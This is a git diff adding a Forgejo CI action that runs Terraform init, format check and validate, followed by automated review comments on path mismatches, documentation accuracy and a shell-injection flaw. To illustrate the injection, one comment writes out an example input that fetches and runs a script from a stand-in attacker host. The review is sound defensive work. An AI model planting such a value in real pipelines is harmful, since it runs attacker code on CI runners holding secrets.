diff --git a/README.md b/README.md index ac5d988..c0964d4 100644 --- a/README.md +++ b/README.md @@ -12,6 +12,7 @@ Shared actions for Forgejo CI/CD pipelines. | [checkout](checkout) | Action for checking out a repository | | [pnpm-build](pnpm-build) | Action for building and validating with PNPM | | [publish-static-contents](publish-static-contents) | Syncs frontend assets to S3 and invalidates a CloudFront distribution | +| [terraform-validate](terraform-validate) | Validate Terraform configuration files using the official Terraform CLI | ## Security diff --git a/terraform-validate/README.md b/terraform-validate/README.md new file mode 100644 index 0000000..9ade172 --- /dev/null +++ b/terraform-validate/README.md @@ -0,0 +1,27 @@ +# terraform-validate + +Validate Terraform configuration files using the official Terraform CLI. + +## Inputs + +| Input | Required | Default | Description | +|-------|----------|---------|-------------| +| `terraform-dir` | No | `terraform` | Directory containing `.tf` files | +| `terraform-version` | No | `~1.15` | Terraform version to use | +| `terraform-workspace` | No | `""` | Terraform workspace to use | +| `jfrog-token` | No | `""` | JFrog Artifactory token for the Terraform provider registry (`TF_TOKEN_schmalz_jfrog_io`) | + +## Usage + +```yaml +- uses: schmalz/shared-actions/.forgejo/actions/terraform-validate@v1 + with: + terraform-workspace: stage + jfrog-token: ${{ secrets.JFROG_TOKEN }} +``` + +## Notes + +- Runs `terraform init -backend=false`, `terraform fmt -check -recursive`, and `terraform validate`. +- Sets `TF_WORKSPACE` during validate if `terraform-workspace` is provided. +- Sets `TF_TOKEN_schmalz_jfrog_io` on both `init` and `validate` steps if `jfrog-token` is provided. \ No newline at end of file diff --git a/terraform-validate/action.yml b/terraform-validate/action.yml new file mode 100644 index 0000000..c2c4b32 --- /dev/null +++ b/terraform-validate/action.yml 
@@ -0,0 +1,52 @@ +name: Terraform Validate +description: > + Validate Terraform configuration files using the official Terraform CLI. + +inputs: + terraform-dir: + description: Directory containing .tf files + required: false + default: terraform + terraform-version: + description: Terraform version to use + required: false + default: "~1.15" + terraform-workspace: + description: Terraform workspace to use + required: false + default: "" + jfrog-token: + description: JFrog Artifactory token used for Terraform provider registry (sets TF_TOKEN_schmalz_jfrog_io) + required: false + default: "" + +runs: + using: composite + steps: + # Pinned to commit SHA instead of a tag to prevent supply chain attacks. + # hashicorp/setup-terraform v4.0.0 — https://github.com/hashicorp/setup-terraform/commits/v4.0.0/ + - name: Setup Terraform + uses: hashicorp/setup-terraform@5e8dbf3c6d9deaf4193ca7a8fb23f2ac83bb6c85 + with: + terraform_version: ${{ inputs.terraform-version }} + + - name: Terraform Init + shell: bash + env: + TF_DIR: ${{ inputs.terraform-dir }} + TF_TOKEN_schmalz_jfrog_io: ${{ inputs.jfrog-token }} + run: terraform -chdir=${{ env.TF_DIR }} init -backend=false -no-color + + - name: Terraform Format Check + shell: bash + env: + TF_DIR: ${{ inputs.terraform-dir }} + run: terraform -chdir=${{ env.TF_DIR }} fmt -check -recursive + + - name: Terraform Validate + shell: bash + env: + TF_DIR: ${{ inputs.terraform-dir }} + TF_WORKSPACE: ${{ inputs.terraform-workspace }} + TF_TOKEN_schmalz_jfrog_io: ${{ inputs.jfrog-token }} + run: terraform -chdir=${{ env.TF_DIR }} validate \ No newline at end of file
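Review bot: in the top-level README.md hunk, the new table row links to the `terraform-validate` directory (which is where this patch adds `action.yml`), but the usage snippet in the new `terraform-validate/README.md` tells consumers to reference `schmalz/shared-actions/.forgejo/actions/terraform-validate@v1`, and nothing under `.forgejo/actions/` is added in this patch. One of the two paths is wrong; either move `action.yml` to where the snippet points or change the snippet to the directory the table row links to, so a copy-pasted `uses:` actually resolves.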
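Review bot: in the `terraform-validate/README.md` hunk, the two "Notes" bullets say `TF_WORKSPACE` and `TF_TOKEN_schmalz_jfrog_io` are set only "if `terraform-workspace`/`jfrog-token` is provided", but the `env:` entries in `action.yml` are unconditional, so with the defaults both variables are exported as empty strings; either guard the env entries in the action or reword the Notes so the documentation matches what the steps do. Two smaller points on the same file: the Usage example references the action by the mutable `@v1` tag while `action.yml` pins `hashicorp/setup-terraform` to a commit SHA "to prevent supply chain attacks", so consider showing a SHA-pinned `uses:` in the example (or adding a sentence recommending it) rather than teaching consumers the tag form; and the file ends with "No newline at end of file", which should be fixed before merge.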
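Review bot: in the `action.yml` hunk, the three `run:` lines interpolate `${{ env.TF_DIR }}` directly into the script text, so the `terraform-dir` input is substituted into the command before bash runs and a value containing shell metacharacters (for example `terraform; curl attacker/x | sh`) is executed rather than passed as a path; since `TF_DIR` is already exported through `env:`, reference it as a quoted shell variable instead, e.g. `run: terraform -chdir="$TF_DIR" init -backend=false -no-color`, and do the same in the fmt and validate steps. Related: `TF_WORKSPACE` and `TF_TOKEN_schmalz_jfrog_io` are set unconditionally even when the inputs are empty, which contradicts the README's "if provided" wording; either add an `if:`/conditional so the variables are only set when non-empty, or document the unconditional behaviour. Minor: `-no-color` is passed only to `init`, so `fmt -check` and `validate` will emit ANSI codes in CI logs; adding it to all three keeps output consistent. Finally, the comment claims the pinned SHA `5e8dbf3c6d9deaf4193ca7a8fb23f2ac83bb6c85` is `v4.0.0`, which a reviewer cannot verify from the diff alone; please confirm the SHA resolves to that tag in the upstream repository, and fix the missing newline at end of file.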